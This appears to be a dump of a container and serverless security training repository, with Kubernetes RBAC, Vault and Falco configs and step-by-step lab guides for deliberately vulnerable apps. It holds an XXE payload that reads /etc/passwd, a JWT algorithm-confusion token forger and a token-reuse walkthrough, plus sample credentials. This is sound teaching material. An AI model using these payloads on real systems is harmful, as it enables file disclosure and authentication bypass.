/Kubernetes/VM/RoleBasedAccessControl/img/rbac-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-1.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-2.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-3.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-4.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-5.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-6.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-7.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-8.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/img/rbac-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/RoleBasedAccessControl/img/rbac-9.png


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/role-deployment-manager.yaml:
--------------------------------------------------------------------------------
 1 | kind: Role
 2 | apiVersion: rbac.authorization.k8s.io/v1beta1
 3 | metadata:
 4 |   namespace: restricted-namespace
 5 |   name: deployment-manager
 6 | rules:
 7 | - apiGroups: ["", "extensions", "apps"]
 8 |   resources: 
 9 |   - deployments
10 |   - replicasets
11 |   - pods
12 |   - services
13 |   verbs:
14 |   - get
15 |   - list
16 |   - watch
17 |   - create
18 |   - update
19 |   - patch
20 | 
21 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/RoleBasedAccessControl/rolebinding-deployment-manager.yaml:
--------------------------------------------------------------------------------
 1 | kind: RoleBinding
 2 | apiVersion: rbac.authorization.k8s.io/v1beta1
 3 | metadata:
 4 |   name: deployment-manager-binding
 5 |   namespace: restricted-namespace
 6 | subjects:
 7 | - kind: User
 8 |   name: restricteduser
 9 |   apiGroup: ""
10 | roleRef:
11 |   kind: Role
12 |   name: deployment-manager
13 |   apiGroup: ""
14 | 
15 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/SealedSecrets/README.md:
--------------------------------------------------------------------------------
 1 | # Kubernetes Sealed Secrets - Kubeseal
 2 | 
 3 | 
 4 | ##### Step 1:
 5 | 
 6 | * Navigate to the `SealedSecrets` directory
 7 | 
 8 | ```bash
 9 | cd /root/container_training/Kubernetes/VM/SealedSecrets
10 | ```
11 | 
12 | 
13 | ##### Step 2:
14 | 
15 | * Ensure that minikube is running
16 | 
17 | ```bash
18 | minikube status
19 | ```
20 | 
21 | 
22 | ##### Step 3:
23 | 
24 | * Seal the existing secret with `kubeseal`
25 | 
26 | ```bash
27 | kubeseal <mysecret.json >mysealedsecret.json
28 | ```
29 | 
30 | * Check the sealed-secret file 
31 | 
32 | ```bash
33 | cat mysealedsecret.json
34 | ```
35 | 
36 | 
37 | ##### Step 5:
38 | 
39 | * Create the Sealed-Secret
40 | 
41 | ```bash
42 | kubectl create -f mysealedsecret.json
43 | ```
44 | 
45 | * Check the created Secret
46 | 
47 | ```bash
48 | kubectl get secrets
49 | ```
50 | 
51 | 
52 | ##### Step 6:
53 | 
54 | * Delete the created sealed secret 
55 | 
56 | ```bash
57 | kubectl delete -f mysealedsecret.json
58 | ```
59 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/SealedSecrets/mysecret.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "kind": "Secret",
 3 |     "apiVersion": "v1",
 4 |     "metadata": {
 5 |         "name": "mysecret",
 6 |         "creationTimestamp": null
 7 |     },
 8 |     "data": {
 9 |         "mysql_pass": "bm9uZW9meW9iaXpuZXNzMTIz",
10 |         "mysql_user": "cm9vdA=="
11 |     }
12 | }
13 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/__init__.py


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/falco-event-generator-deployment.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: extensions/v1beta1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: falco-event-generator-deployment
 5 |   labels:
 6 |     name: falco-event-generator-deployment
 7 |     app: demo
 8 | spec:
 9 |   replicas: 1
10 |   template:
11 |     metadata:
12 |       labels:
13 |         app: falco-event-generator
14 |     spec:
15 |       containers:
16 |       - name: falco-event-generator
17 |         image: sysdig/falco-event-generator:latest
18 | 
19 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-1.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-2.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-3.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-4.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-5.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-6.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/img/sysdig-falco-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/SysdigFalco/img/sysdig-falco-7.png


--------------------------------------------------------------------------------
/Kubernetes/VM/SysdigFalco/tornado_server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import tornado.ioloop
 4 | import tornado.web
 5 | import pprint
 6 | 
 7 | 
 8 | class MyDumpHandler(tornado.web.RequestHandler):
 9 |     def post(self):
10 |         pprint.pprint(self.request)
11 |         pprint.pprint(self.request.body)
12 | 
13 | if __name__ == "__main__":
14 |     tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090)
15 |     tornado.ioloop.IOLoop.instance().start()
16 | 
17 | 


--------------------------------------------------------------------------------
/Kubernetes/Vault/policy-kubernetes-vault.hcl:
--------------------------------------------------------------------------------
1 | path "intermediate-ca/issue/kubernetes-vault" {
2 |   capabilities = ["update"]
3 | }
4 | 
5 | path "auth/token/roles/kubernetes-vault" {
6 |   capabilities = ["read"]
7 | }
8 | 


--------------------------------------------------------------------------------
/Kubernetes/Vault/policy-sample-app.hcl:
--------------------------------------------------------------------------------
1 | path "auth/approle/role/sample-app/secret-id" {
2 |   capabilities = ["update"]
3 | }
4 | 


--------------------------------------------------------------------------------
/Kubernetes/Vault/sample-app.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: extensions/v1beta1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: sample-app
 5 | spec:
 6 |   replicas: 2
 7 |   template:
 8 |     metadata:
 9 |       labels:
10 |         app: sample-app
11 |       annotations:
12 |         pod.boostport.com/vault-approle: sample-app
13 |         pod.boostport.com/vault-init-container: get-vault-token
14 |     spec:
15 |       containers:
16 |       - name: sample-app
17 |         image: boostport/kubernetes-vault-sample-app
18 |         volumeMounts:
19 |         - name: vault-token
20 |           mountPath: /var/run/secrets/boostport.com
21 |       initContainers:
22 |       - name: get-vault-token
23 |         image: boostport/kubernetes-vault-init
24 |         imagePullPolicy: Always
25 |         env:
26 |         - name: VAULT_ROLE_ID
27 |           value: Replace_with_$VAULT_ROLE_ID_Value_Here
28 |         volumeMounts:
29 |         - name: vault-token
30 |           mountPath: /var/run/secrets/boostport.com
31 |       volumes:
32 |       - name: vault-token
33 |         emptyDir: {}
34 | 


--------------------------------------------------------------------------------
/Kubernetes/Vault/vault.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: vault
 5 |   labels:
 6 |     app: vault
 7 | spec:
 8 |   ports:
 9 |   - name: vault
10 |     port: 8200
11 |   selector:
12 |     app: vault
13 | ---
14 | apiVersion: extensions/v1beta1
15 | kind: Deployment
16 | metadata:
17 |   labels:
18 |     app: vault
19 |   name: vault
20 | spec:
21 |   replicas: 1
22 |   template:
23 |     metadata:
24 |       labels:
25 |         app: vault
26 |     spec:
27 |       containers:
28 |       - image: vault
29 |         name: vault
30 |         ports:
31 |         - containerPort: 8200
32 |           name: vaultport
33 |           protocol: TCP
34 |         securityContext:
35 |           capabilities:
36 |             add:
37 |             - IPC_LOCK
38 |         env:
39 |         - name: VAULT_DEV_ROOT_TOKEN_ID
40 |           value: vault-root-token


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # [Container Security, Orchestration and Serverless Training Manual](https://github.com/we45/container_training)
 2 | 
 3 | ## Content
 4 | 
 5 | 
 6 | 1. ##### [Containers](Container/README.md)
 7 | 
 8 | 2. ##### [Kuberenetes](Kubernetes/README.md)
 9 | 
10 | 3. ##### [Serverless](Serverless/README.md)
11 | 
12 | 
13 | -----
14 | 
15 | * ##### Brought to you by [we45](https://www.we45.com)
16 | 
17 |     ![](img/we45logo.jpg)
18 | 
19 | 
20 | #### Contact Us
21 | 
22 | [![Twitter](img/twitter.png)](https://twitter.com/we45)
23 | [![Github](img/github.png)](https://github.com/we45)
24 | 


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/img/click-local-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/click-local-storage.png


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/img/local-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/local-storage.png


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/img/login-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/login-page.png


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/img/open-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Algorithm-Confusion/img/open-browser.png


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/public_key.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN PUBLIC KEY-----
 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2fkx4Ee2DVFKLv0FvPAg
 3 | QLzPEBqbxKg41+D118GH+sc/YOzD5R+4MlTuB5L+OL7vwjS3NrZvfV86n5ylMLMG
 4 | I2lm34qKVnZu2dCExRSEx6aRD0Ql45j0DCx4nJWkujYuHyUpSTGdG8Al4nWxdmYn
 5 | L8UJRDvWJdx7aiKElj1hm+X4pVCxDKLWyGp+rzaTolVq+eJ5XeogAwgyO53eoxak
 6 | +DY4+63J6P7Qfxu8QXu4/tedR/vz597CJEi5YoMguV67cHTIfAV/N4IvhZhDdbmB
 7 | lkftCHMnLJEkhCyew0gtcu9KciT/75f7xWVTC1a9+SaBumNfveyQJxcr/hhxjv5r
 8 | KQIDAQAB
 9 | -----END PUBLIC KEY-----
10 | 


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/token.txt:
--------------------------------------------------------------------------------
1 | eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwic3RhdHVzIjoiaGFja2VkIiwiaWF0IjoxNTM5MDIyNzM4fQ.jGgc48P75ePUtISPCjdgo59Sq5QvwVncGW_EerzuI-Q
2 | 


--------------------------------------------------------------------------------
/Serverless/Algorithm-Confusion/token_gen.js:
--------------------------------------------------------------------------------
 1 | const jwt = require("jsonwebtoken");
 2 | const fs = require("fs");
 3 | const colors = require("colors/safe");
 4 | if (process.argv.length < 5) {
 5 |   console.error("You need to provide --file <filepath> and --username <username> argument")
 6 | } else {
 7 |   let key = fs.readFileSync(process.argv[3], "utf8");
 8 |   let token = jwt.sign({ username: process.argv[5], status: "hacked" }, key, {
 9 |   algorithm: "HS256"
10 |   });
11 |   console.log("\n")
12 |   console.log(colors.green("This is your token: " + token));
13 | }


--------------------------------------------------------------------------------
/Serverless/Bandit/README.md:
--------------------------------------------------------------------------------
 1 | # **`Bandit - Python Static-Application-Security-Testing`**
 2 | 
 3 | 
 4 | Step 1: Navigate to the directory that has the project to be scanned
 5 | 
 6 | ```bash
 7 | cd /root
 8 | ```
 9 | 
10 | Step 2: Run `bandit -r -f json -o bandit_result.json DVFaaS-Damn-Vulnerable-Functions-as-a-Service/` to run a bandit scan and generate a `json` report.
11 | 
12 | ![](img/bandit-2.png)
13 | 
14 | 
15 | Step 3: The report is generated and can be read
16 | 
17 | ![](img/bandit-3.png)
18 | 
19 | 


--------------------------------------------------------------------------------
/Serverless/Bandit/img/bandit-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Bandit/img/bandit-1.png


--------------------------------------------------------------------------------
/Serverless/Bandit/img/bandit-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Bandit/img/bandit-2.png


--------------------------------------------------------------------------------
/Serverless/Bandit/img/bandit-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Bandit/img/bandit-3.png


--------------------------------------------------------------------------------
/Serverless/Deploy a Function/README.md:
--------------------------------------------------------------------------------
 1 | ## Deploy a Serverless Function
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Install pip3, if it is not installed
 6 | 
 7 | ```bash
 8 | wget https://bootstrap.pypa.io/get-pip.py && python3 get-pip.py && rm get-pip.py
 9 | ```
10 | 
11 | * Install `Chalice`
12 | 
13 | ```bash
14 | pip3 install chalice
15 | ```
16 | 
17 | ##### Step 2:
18 | 
19 | * Navigate to `DVFaaS` Directory
20 | 
21 | ```bash
22 | cd /root/DVFaaS-Damn-Vulnerable-Functions-as-a-Service/
23 | 
24 | ls
25 | ```
26 | 
27 | * Navigate to Insecure Deserialization directory
28 | 
29 | ```bash
30 | cd insecure_deserialization/insecure-deserialization
31 | ```
32 | 
33 | 
34 | ##### Step 3:
35 | 
36 | #### * IMPORTANT: Ensure that the AWS creds have been configured!
37 | 
38 | 
39 | * Set the necessary environment variables
40 | 
41 | ```bash
42 | export LC_ALL=C.UTF-8
43 | 
44 | export LANG=C.UTF-8
45 | ```
46 | 
47 | * Deploy the serverless function using `chalice`
48 | 
49 | ```bash
50 | chalice deploy
51 | ```
52 | 
53 | ##### Step 3:
54 | 
55 | * Delete the serverless function
56 | 
57 | ```bash
58 | chalice delete
59 | ```
60 | 


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/README.md:
--------------------------------------------------------------------------------
 1 | ## Event Injection S3
 2 | 
 3 | ##### Step 1:
 4 | * Open browser
 5 | 
 6 | ![](img/open-browser.png)
 7 | 
 8 | 
 9 | ##### Step 2:
10 | 
11 | * open `http://sls-training-ui.s3-website-us-east-1.amazonaws.com/` to access the XML-Uploader application.
12 | 
13 | ![](img/login-page.png)
14 | 
15 | 
16 | ##### Step 3:
17 | 
18 | * Click Register icon to register on the application
19 | 
20 |     **Note:** Please enter required information and submit.
21 | 
22 |     ![](img/register-page.png)
23 | 
24 | 
25 | ##### Step 4:
26 | 
27 | * Using `email` and `password` login to the application.
28 | 
29 | ![](img/login-page.png)
30 | 
31 | ##### Step 5:
32 | 
33 | * Once Logged in, click `Upload File` icon
34 | 
35 | ![](img/click-upload-xml.png)
36 | 
37 | ##### Step 6:
38 | 
39 | * Upload-XML file view
40 | 
41 | **Note:** Please upload a malicious XML file (https://github.com/we45/container_training/blob/master/Serverless/Event-Injection-S3/malicious-xml.xml)
42 | 
43 | ![](img/upload-file-view.png)
44 | 
45 | 
46 | ##### Step 7:
47 | 
48 | * Once the file has been uploaded, It will redirect to `/home/` .
49 | 
50 | **Note:** Here will see all our uploaded Xml files. Please refresh the page if the file is not visible.
51 | 
52 | ![](img/upload-file-view.png)
53 | 
54 | ##### Step 8:
55 | 
56 | * Click the file name on the left .
57 | 
58 | ![](img/click-xml-file.png)
59 | 
60 | ##### Step 9:
61 | 
62 | * You will see that the exploitation has been successful.
63 | 
64 | ![](img/exploited-info.png)
65 | 
66 | 


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/click-upload-xml.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/click-upload-xml.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/click-xml-file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/click-xml-file.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/exploited-info.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/exploited-info.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/login-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/login-page.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/open-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/open-browser.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/register-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/register-page.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/img/upload-file-view.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Event-Injection-S3/img/upload-file-view.png


--------------------------------------------------------------------------------
/Serverless/Event-Injection-S3/malicious-xml.xml:
--------------------------------------------------------------------------------
1 | <!--?xml version="1.0" ?-->
2 | <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
3 | <userInfo>
4 |  <firstName>John</firstName>
5 |  <lastName>&ent;</lastName>
6 | </userInfo>


--------------------------------------------------------------------------------
/Serverless/Initial-Setup/README.md:
--------------------------------------------------------------------------------
 1 | # Steps to run before starting Labs
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Update the Labs
 6 | 
 7 | ```bash
 8 | cd Serverless/Initial-Setup/
 9 | 
10 | ./install_script.sh
11 | ```
12 | 


--------------------------------------------------------------------------------
/Serverless/Initial-Setup/install_script.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # Clone necessary repositories
 4 | git clone https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service.git ~/DVFaaS-Damn-Vulnerable-Functions-as-a-Service
 5 | git clone https://github.com/we45/Cut-The-Funds-NodeJS.git ~/Cut-The-Funds-NodeJS
 6 | git clone https://github.com/we45/NodeJsScan.git ~/NodeJsScan
 7 | git clone https://github.com/we45/serverless-training-apps.git ~/serverless-training-apps
 8 | 
 9 | # Install Node
10 | curl -s https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add -
11 | echo 'deb https://deb.nodesource.com/node_10.x xenial main' > /etc/apt/sources.list.d/nodesource.list
12 | echo 'deb-src https://deb.nodesource.com/node_10.x xenial main' >> /etc/apt/sources.list.d/nodesource.list
13 | sleep 2
14 | apt update
15 | killall dpkg && dpkg --configure -a
16 | sleep 1
17 | apt install -y nodejs virtualenv
18 | 
19 | # Install bandit, pipenv & awscli
20 | pip install bandit pipenv awscli
21 | 
22 | export LC_ALL=en_US.UTF-8
23 | export LANG=en_US.UTF-8
24 | 
25 | pip uninstall -y urllib3 && pip install urllib3==1.22
26 | 
27 | # DVFaaS pipenv requirements
28 | cd /root/DVFaaS-Damn-Vulnerable-Functions-as-a-Service && pipenv --python /usr/bin/python3 install boto3 && cd ~/
29 | 
30 | echo "Done!"


--------------------------------------------------------------------------------
/Serverless/NodeJsScan/README.md:
--------------------------------------------------------------------------------
 1 | # **`NodeJsScan - NodeJS Static-Application-Security-Testing`**
 2 | 
 3 | 
 4 | Step 1: Navigate to the NodeJsScan directory.
 5 | 
 6 | ```bash
 7 | cd /root/NodeJsScan
 8 | ```
 9 | 
10 | 
11 | Step 2: Create a python-virtual environment
12 | 
13 | ```bash
14 | virtualenv -p python2 venv
15 | 
16 | ls
17 | ```
18 | 
19 | 
20 | Step 3: Activate python-virtual environment and install the requirements.
21 | 
22 | ```bash
23 | source venv/bin/activate
24 | 
25 | pip install -r requirements.txt
26 | ```
27 | 
28 | 
29 | Step 4: Run the scan against a directory containing NodeJS code and generate a `json` report.
30 | 
31 | ```bash
32 | python cli.py -r report -d /root/serverless-training-apps/jwt_example/
33 | ```
34 | 
35 | 
36 | Step 5: The report is generated and can be read
37 | 
38 | ```bash
39 | cat report.json
40 | ```
41 | 


--------------------------------------------------------------------------------
/Serverless/NodeJsScan/img/nodejsscan-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-1.png


--------------------------------------------------------------------------------
/Serverless/NodeJsScan/img/nodejsscan-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-2.png


--------------------------------------------------------------------------------
/Serverless/NodeJsScan/img/nodejsscan-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-3.png


--------------------------------------------------------------------------------
/Serverless/NodeJsScan/img/nodejsscan-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/NodeJsScan/img/nodejsscan-4.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/README.md:
--------------------------------------------------------------------------------
 1 | ## None-Unique Values
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Open browser
 6 | 
 7 | ![](img/open-browser.png)
 8 | 
 9 | 
10 | ##### Step 2:
11 | 
12 | * open `http://sls-training-ui.s3-website-us-east-1.amazonaws.com/` to access the XML-Uploader application.
13 | **Note:** Login as
14 |  ```
15 |  email: jr@widget.co
16 |  password: Test@1234    
17 |  ```
18 |  * Username is `john`
19 | 
20 | ![](img/login-page.png)
21 | 
22 | 
23 | ##### Step 3:
24 | 
25 | * Click `Shift + f9` or right click on top of the browser and click on `Web Developer` to select the `Storage Inspect` tab.
26 | 
27 | ![](img/local-storage.png)
28 | 
29 | ##### Step 4:
30 | 
31 | * Copy the `token`
32 | 
33 | ![](img/copy-token.png)
34 | 
35 | ##### Step 5:
36 | 
37 | * Click on `protected` icon.
38 | 
39 | ![](img/click-protected.png)
40 | 
41 | ##### Step 6:
42 | 
43 | * Follow the instructor .
44 | 
45 | ##### Step 7:
46 | 
47 | * Register new user with  `john` username.
48 | 
49 | ![](img/register-page.png)
50 | 
51 | ##### Step 8:
52 | 
53 | * Once the user registered don't login
54 | 
55 | ##### Step 9:
56 | 
57 | * Click `Shift + f9` or right click on top of the browser and click on `Web Developer` to select the `Storage Inspect` tab.
58 | 
59 | ![](img/local-storage.png)
60 | 
61 | ##### Step 10:
62 | 
63 | * Paste the `token` you copied
64 | 
65 | ![](img/paste-token.png)
66 | 
67 | ##### Step 11:
68 |  
69 | * Once `token` is pasted , access the URL `http://sls-training-ui.s3-website-us-east-1.amazonaws.com/protected`
70 | 
71 | ![](img/finalised.png)
72 | 
73 | 
74 | 


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/Open-Terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/Open-Terminal.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/click-protected.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/click-protected.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/copy-token.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/copy-token.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/finalised.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/finalised.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/local-storage.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/local-storage.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/login-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/login-page.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/open-browser.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/open-browser.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/paste-token.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/paste-token.png


--------------------------------------------------------------------------------
/Serverless/Non-Unique-Value/img/register-page.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Serverless/Non-Unique-Value/img/register-page.png


--------------------------------------------------------------------------------
/Serverless/None-Signed-Token/img/Open-Terminal.png:
--------------------------------------------------------------------------------
